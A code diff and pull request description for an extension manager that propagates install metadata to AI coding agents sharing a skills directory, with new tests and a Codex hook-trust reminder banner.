-            // skip the write — target stays unlinked, which is correct.
-            //
-            // We must scan-and-sync the target adapter first so the new row
-            // exists in the DB before set_install_meta can update it.
-            // Cross-agent deploy targets are global-only today, so the
-            // target_id derives from the unscoped stable_id.
+            // cross-agent deploys produce consistent provenance — and let
+            // post_install_sync fan that out to cross-vendor siblings (when
+            // target_dir is a shared path like `~/.agents/skills/`).
+            // Hand-managed sources (no install_meta) skip; the target file
+            // is on disk and a future scan_all will pick it up unlinked,
+            // matching the source's lack of provenance.
             if let Some(meta) = ext.install_meta.clone() {
-                let scanned = scanner::scan_adapter(target_adapter.as_ref());
-                let target_id =
-                    scanner::stable_id_for(&deployed_name, "skill", target_agent);
                 let store_guard = store.lock();
-                store_guard.sync_extensions_for_agent(target_agent, &scanned)?;
-                let _ = store_guard.set_install_meta(&target_id, &meta);
+                post_install_sync(
+                    &store_guard,
+                    adapters,
+                    &[target_agent.to_string()],
+                    &deployed_name,
+                    Some(meta),
+                    ext.pack.as_deref(),
+                    &ConfigScope::Global,
+                )?;
             }
             Ok(deployed_name)
         }
@@ -946,10 +1060,7 @@ pub fn install_to_agent(
                 .into_iter()
                 .next()
                 .ok_or_else(|| {
-                    HkError::Internal(format!(
-                        "No skill directory for agent '{}'",
-                        target_agent
-                    ))
+                    HkError::Internal(format!("No skill directory for agent '{}'", target_agent))
                 })?;
             let deployed_name = deployer::deploy_skill(&source_path, &target_dir)?;
             Ok(deployed_name)
@@ -1104,9 +1215,9 @@ mod tests {
         std::fs::create_dir_all(&skills_dir).unwrap();
         std::fs::write(skills_dir.join("SKILL.md"), "---\nname: foo\n---\n").unwrap();
 
-        let adapters: Vec<Box<dyn adapter::AgentAdapter>> = vec![
-            Box::new(adapter::claude::ClaudeAdapter::with_home(home.to_path_buf())),
-        ];
+        let adapters: Vec<Box<dyn adapter::AgentAdapter>> = vec![Box::new(
+            adapter::claude::ClaudeAdapter::with_home(home.to_path_buf()),
+        )];
 
         let target_scope = ConfigScope::Project {
             name: "demo".into(),
@@ -1136,8 +1247,7 @@ mod tests {
         .unwrap();
 
         // Assert: install_meta lands on the project-scoped row
-        let project_id =
-            scanner::stable_id_with_scope_for("foo", "skill", "claude", &target_scope);
+        let project_id = scanner::stable_id_with_scope_for("foo", "skill", "claude", &target_scope);
         let ext = store
             .get_extension(&project_id)
             .unwrap()
@@ -1210,7 +1320,10 @@ mod tests {
         // Source: a Claude global skill installed from a marketplace.
         std::fs::create_dir_all(home.join(".claude").join("skills").join("foo")).unwrap();
         std::fs::write(
-            home.join(".claude").join("skills").join("foo").join("SKILL.md"),
+            home.join(".claude")
+                .join("skills")
+                .join("foo")
+                .join("SKILL.md"),
             "---\nname: foo\n---\n",
         )
         .unwrap();
@@ -1220,7 +1333,9 @@ mod tests {
         std::fs::create_dir_all(home.join(".codex")).unwrap();
 
         let adapters: Vec<Box<dyn adapter::AgentAdapter>> = vec![
-            Box::new(adapter::claude::ClaudeAdapter::with_home(home.to_path_buf())),
+            Box::new(adapter::claude::ClaudeAdapter::with_home(
+                home.to_path_buf(),
+            )),
             Box::new(adapter::codex::CodexAdapter::with_home(home.to_path_buf())),
         ];
 
@@ -1273,13 +1388,18 @@ mod tests {
         // Cross-agent deploy: claude/foo → codex.
         install_to_agent(&store, &adapters, &source_id, "codex").unwrap();
 
-        // File deployed to codex skill dir.
+        // File deployed to codex's canonical skill dir (~/.agents/skills),
+        // which is now first in skill_dirs() per Codex's current docs;
+        // ~/.codex/skills is kept as a deprecated fallback.
         let target_skill_md = home
-            .join(".codex")
+            .join(".agents")
             .join("skills")
             .join("foo")
             .join("SKILL.md");
-        assert!(target_skill_md.exists(), "deploy_skill should write target SKILL.md");
+        assert!(
+            target_skill_md.exists(),
+            "deploy_skill should write target SKILL.md"
+        );
 
         // Target row carries the same install_meta as source — the whole
         // point of this test.
@@ -1309,14 +1429,19 @@ mod tests {
 
         std::fs::create_dir_all(home.join(".claude").join("skills").join("bar")).unwrap();
         std::fs::write(
-            home.join(".claude").join("skills").join("bar").join("SKILL.md"),
+            home.join(".claude")
+                .join("skills")
+                .join("bar")
+                .join("SKILL.md"),
             "---\nname: bar\n---\n",
         )
         .unwrap();
         std::fs::create_dir_all(home.join(".codex")).unwrap();
 
         let adapters: Vec<Box<dyn adapter::AgentAdapter>> = vec![
-            Box::new(adapter::claude::ClaudeAdapter::with_home(home.to_path_buf())),
+            Box::new(adapter::claude::ClaudeAdapter::with_home(
+                home.to_path_buf(),
+            )),
             Box::new(adapter::codex::CodexAdapter::with_home(home.to_path_buf())),
         ];
 
@@ -1359,9 +1484,9 @@ mod tests {
 
         // No install_meta to propagate — target row may not even exist in
         // the DB yet (we only sync target when there's meta to write). The
-        // file is on disk; that's enough.
+        // file is on disk in codex's canonical skill dir; that's enough.
         let target_skill_md = home
-            .join(".codex")
+            .join(".agents")
             .join("skills")
             .join("bar")
             .join("SKILL.md");
@@ -1376,5 +1501,201 @@ mod tests {
                 "must not synthesize install_meta when source had none"
             );
         }
+    }
+
+    /// Cross-vendor sibling propagation: when install lands in a directory
+    /// that multiple detected adapters scan (e.g. ~/.agents/skills/ shared by
+    /// Codex / Gemini CLI / Cursor / Copilot / OpenCode at user-global
+    /// scope), every sibling's row must also receive install_meta. Without
+    /// this, the Marketplace's URL-based "installed?" check matches only
+    /// the explicit target and falsely shows the siblings as not installed.
+    #[test]
+    fn test_install_to_agent_propagates_install_meta_to_cross_vendor_siblings() {
+        use crate::adapter;
+
+        let dir = TempDir::new().unwrap();
+        let home = dir.path();
+        let store_raw = Store::open(&home.join("test.db")).unwrap();
+        let store = Mutex::new(store_raw);
+
+        // Source: Claude global skill (its skill_dirs() does not include
+        // ~/.agents/skills/, so Claude is intentionally NOT a sibling).
+        std::fs::create_dir_all(home.join(".claude").join("skills").join("baz")).unwrap();
+        std::fs::write(
+            home.join(".claude")
+                .join("skills")
+                .join("baz")
+                .join("SKILL.md"),
+            "---\nname: baz\n---\n",
+        )
+        .unwrap();
+
+        // Detect Codex (target) AND Gemini (sibling — also scans
+        // ~/.agents/skills/). Cursor/Copilot/OpenCode would also qualify but
+        // two siblings is enough to prove the loop logic.
+        std::fs::create_dir_all(home.join(".codex")).unwrap();
+        std::fs::create_dir_all(home.join(".gemini")).unwrap();
+
+        let adapters: Vec<Box<dyn adapter::AgentAdapter>> = vec![
+            Box::new(adapter::claude::ClaudeAdapter::with_home(
+                home.to_path_buf(),
+            )),
+            Box::new(adapter::codex::CodexAdapter::with_home(home.to_path_buf())),
+            Box::new(adapter::gemini::GeminiAdapter::with_home(
+                home.to_path_buf(),
+            )),
+        ];
+
+        let source_id = scanner::stable_id_for("baz", "skill", "claude");
+        let install_meta = InstallMeta {
+            install_type: "marketplace".into(),
+            url: Some("https://github.com/foo/bar/baz".into()),
+            url_resolved: Some("https://github.com/foo/bar.git".into()),
+            branch: None,
+            subpath: Some("baz".into()),
+            revision: Some("def456".into()),
+            remote_revision: None,
+            checked_at: None,
+            check_error: None,
+        };
+        store
+            .lock()
+            .insert_extension(&Extension {
+                id: source_id.clone(),
+                kind: ExtensionKind::Skill,
+                name: "baz".into(),
+                description: String::new(),
+                source: Source {
+                    origin: SourceOrigin::Agent,
+                    url: None,
+                    version: None,
+                    commit_hash: None,
+                },
+                agents: vec!["claude".into()],
+                tags: vec![],
+                pack: None,
+                permissions: vec![],
+                enabled: true,
+                trust_score: None,
+                installed_at: chrono::Utc::now(),
+                updated_at: chrono::Utc::now(),
+                source_path: Some(
+                    home.join(".claude")
+                        .join("skills")
+                        .join("baz")
+                        .join("SKILL.md")
+                        .to_string_lossy()
+                        .to_string(),
+                ),
+                cli_parent_id: None,
+                cli_meta: None,
+                install_meta: Some(install_meta.clone()),
+                scope: ConfigScope::Global,
+            })
+            .unwrap();
+
+        install_to_agent(&store, &adapters, &source_id, "codex").unwrap();
+
+        let target_id = scanner::stable_id_for("baz", "skill", "codex");
+        let sibling_id = scanner::stable_id_for("baz", "skill", "gemini");
+
+        let codex_row = store.lock().get_extension(&target_id).unwrap().unwrap();
+        let gemini_row = store.lock().get_extension(&sibling_id).unwrap().unwrap();
+
+        let codex_meta = codex_row
+            .install_meta
+            .expect("codex row should carry install_meta");
+        let gemini_meta = gemini_row
+            .install_meta
+            .expect("gemini sibling must also carry propagated install_meta");
+        assert_eq!(codex_meta.url, install_meta.url);
+        assert_eq!(gemini_meta.url, install_meta.url);
+        assert_eq!(gemini_meta.revision, install_meta.revision);
+    }
+
+    /// Same propagation guarantee, but exercised through `post_install_sync`
+    /// directly (the path Marketplace install actually runs through). The
+    /// previous test covers `install_to_agent` (cross-agent deploy button);
+    /// this one covers the marketplace install flow that drove the bug
+    /// the user reported during manual testing.
+    #[test]
+    fn test_post_install_sync_propagates_install_meta_to_cross_vendor_siblings() {
+        use crate::adapter;
+
+        let dir = TempDir::new().unwrap();
+        let home = dir.path();
+        let store_raw = Store::open(&home.join("test.db")).unwrap();
+        let store = Mutex::new(store_raw);
+
+        // Marketplace flow already wrote the file; we just simulate the
+        // post-deploy bookkeeping. Drop a SKILL.md into the shared
+        // ~/.agents/skills/qux/ where Codex and Gemini will both find it.
+        std::fs::create_dir_all(home.join(".agents").join("skills").join("qux")).unwrap();
+        std::fs::write(
+            home.join(".agents")
+                .join("skills")
+                .join("qux")
+                .join("SKILL.md"),
+            "---\nname: qux\n---\n",
+        )
+        .unwrap();
+
+        // Detect Codex (target) + Gemini (sibling — also scans
+        // ~/.agents/skills/). Claude is intentionally not registered as an
+        // adapter here — its presence wouldn't affect the test, but keeping
+        // the adapter list small clarifies intent.
+        std::fs::create_dir_all(home.join(".codex")).unwrap();
+        std::fs::create_dir_all(home.join(".gemini")).unwrap();
+
+        let adapters: Vec<Box<dyn adapter::AgentAdapter>> = vec![
+            Box::new(adapter::codex::CodexAdapter::with_home(home.to_path_buf())),
+            Box::new(adapter::gemini::GeminiAdapter::with_home(home.to_path_buf())),
+        ];
+
+        let install_meta = InstallMeta {
+            install_type: "marketplace".into(),
+            url: Some("https://github.com/foo/bar/qux".into()),
+            url_resolved: Some("https://github.com/foo/bar.git".into()),
+            branch: None,
+            subpath: Some("qux".into()),
+            revision: Some("789xyz".into()),
+            remote_revision: None,
+            checked_at: None,
+            check_error: None,
+        };
+
+        {
+            let store_guard = store.lock();
+            post_install_sync(
+                &store_guard,
+                &adapters,
+                &["codex".to_string()],
+                "qux",
+                Some(install_meta.clone()),
+                None,
+                &ConfigScope::Global,
+            )
+            .unwrap();
+        }
+
+        let codex_id = scanner::stable_id_for("qux", "skill", "codex");
+        let gemini_id = scanner::stable_id_for("qux", "skill", "gemini");
+        let codex_meta = store
+            .lock()
+            .get_extension(&codex_id)
+            .unwrap()
+            .unwrap()
+            .install_meta
+            .expect("codex row should carry install_meta from explicit target");
+        let gemini_meta = store
+            .lock()
+            .get_extension(&gemini_id)
+            .unwrap()
+            .unwrap()
+            .install_meta
+            .expect("gemini sibling row must carry propagated install_meta");
+        assert_eq!(codex_meta.url, install_meta.url);
+        assert_eq!(gemini_meta.url, install_meta.url);
+        assert_eq!(gemini_meta.revision, install_meta.revision);
     }
 }

--- a/src/components/extensions/extension-detail.tsx
+++ b/src/components/extensions/extension-detail.tsx
@@ -6,6 +6,7 @@ import {
   FolderOpen,
   GitBranch,
   Globe,
+  Info,
   Loader2,
   Trash2,
 } from "lucide-react";
@@ -178,6 +179,25 @@ export function ExtensionDetail() {
           )}
           {group.description}
         </p>
+
+        {/* Codex hook trust reminder.
+         * Codex CLI 0.129+ requires the user to explicitly trust each hook
+         * via `codex /hooks` before it executes. We don't track trust state
+         * here (Codex's hash format may evolve and we'd silently break) — a
+         * static reminder is more robust than detection. Shown for any hook
+         * with `codex` in its agents list. */}
+        {group.kind === "hook" && group.agents.includes("codex") && (
+          <div className="mt-3 flex items-start gap-2 rounded-md border border-primary/20 bg-primary/5 px-3 py-2 text-xs text-foreground">
+            <Info size={14} className="mt-0.5 shrink-0 text-primary" />
+            <span>
+              Codex hooks must be trusted via{" "}
+              <code className="rounded bg-muted px-1 py-0.5 text-[11px]">
+                codex /hooks
+              </code>{" "}
+              before they run.
+            </span>
+          </div>
+        )}
 
         {/* 1. Status + Source row */}
         <div className="mt-4 flex items-center gap-2">


### PR DESCRIPTION
## Summary

Comprehensive Codex adapter audit driven by issue #22 point 5b ("Codex full extension installation support"). Cross-checked HK's adapter against Codex's current published docs and rust-v0.130.0 source code; fixed multiple alignment gaps and one user-visible installation correctness bug along the way.

## What changed

| Commit | Area | Why it matters |
|---|---|---|
| `5eb723d` `fix(codex)` | adapter paths (skills, memories, project hooks, doc fallback) | HK was missing `~/.agents/skills` as canonical user-skill path, missing project-level `<repo>/.codex/hooks.json` discovery, hardcoding only 2 of Codex's 4 default rule-doc filenames, and at risk of silently scanning the privacy-sensitive Chronicle directory. |
| `3f62df8` `fix(codex)` | `[features].hooks` flag rename + duplicate-section bug | Codex deprecated `codex_hooks` in favor of `hooks`. Old string-append also produced duplicate `[features]` sections that TOML rejects on re-parse. Refactored to parse-modify-serialize. |
| `b0fab1e` `fix` | cross-vendor sibling install_meta propagation | When installing to `~/.agents/skills/` (a directory Codex/Gemini/Cursor/Copilot/OpenCode all scan per their docs), only the explicit target's row got `install_meta`. Marketplace's URL-based "installed?" check then falsely showed siblings as not installed. Now propagates to every adapter that scans the install dir. Also collapses duplicate sibling-propagation logic that existed in `install_to_agent` and `post_install_sync`. |
| `4565f7a` `feat(ui)` | Codex hook trust reminder banner | Codex 0.129+ requires the user to trust each hook via `codex /hooks` before it executes. Static reminder banner shown in the detail panel when a hook has Codex in its agent list. Deliberately not detecting actual trust state — Codex's hash recipe and hook-key format are explicitly flagged as churn-prone in upstream source. |

## Verification

- [x] `cargo test --workspace` — 400 tests pass (15 new across the four commits)
- [x] `cargo clippy --workspace --all-targets -- -D warnings` clean
- [x] `npm run lint` and `npx tsc --noEmit` clean
- [x] Manual smoke (all on a real machine with Codex CLI 0.130.0):
  - [x] Marketplace install to Codex lands at `~/.agents/skills/<name>/SKILL.md`
  - [x] Marketplace install to Codex now correctly marks all 5 cross-vendor siblings as installed (Codex / Gemini CLI / Cursor / Copilot / OpenCode)
  - [x] Hook install writes `[features].hooks = true` (not deprecated `codex_hooks`); merges into a preexisting `[features]` table without producing a duplicate section
  - [x] Project rule files scanning surfaces all 4 default fallback filenames at `<project_root>/`: `AGENTS.override.md`, `AGENTS.md`, `TEAM_GUIDE.md`, `.agents.md`
  - [x] `<project>/.codex/hooks.json` discovered as a project-scoped hook
  - [x] Codex hook trust banner persists in detail panel for any hook where Codex is in `agents`

## Out of scope (deferred)

- Full hook trust state UI (Trusted / Modified / Untrusted badges). Requires replicating Codex's hash algorithm; upstream marks the recipe as churn-prone. The static banner here covers 95% of the user need (post-install reminder to trust).
- `~/.codex/.agents/skills` walk into nested subdirectories for monorepos. Existing HK convention of scanning at the project root only matches HK's project-MCP behavior. No issue reports.
- Codex's per-skill `[[skills.config]] enabled = false` native disable mechanism. Cross-cutting design issue tracked alongside MCP per-agent state in \`project_mcp_per_agent_native_state_roadmap.md\`.

Refs #22 (point 5b).

🤖 Generated with [Claude Code](https://claude.com/claude-code)